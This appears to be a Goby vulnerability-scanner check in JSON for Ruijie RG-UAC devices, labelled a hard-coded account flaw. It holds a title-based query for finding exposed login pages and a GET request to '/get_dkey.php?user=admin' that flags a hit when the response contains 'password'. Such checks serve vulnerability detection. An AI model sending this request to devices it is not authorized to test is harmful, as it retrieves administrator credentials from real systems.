Goby/json/RG_UAC.json

51 lines
1.7 KiB
JSON

{
"Name": "RG-UAC",
"Level": "3",
"Tags": [],
"GobyQuery": "title=\"RG-UAC登录页面\"",
"Description": "锐捷RG-UAC 账户硬编码漏洞",
"Product": "",
"Homepage": "https://gobies.org/",
"Author": "gobysec@gmail.com",
"Impact": "",
"Recommandation": "",
"References": [
"https://gobies.org/"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/get_dkey.php?user=admin",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "password",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-25 13:05:29",
"GobyVersion": "1.8.239"
}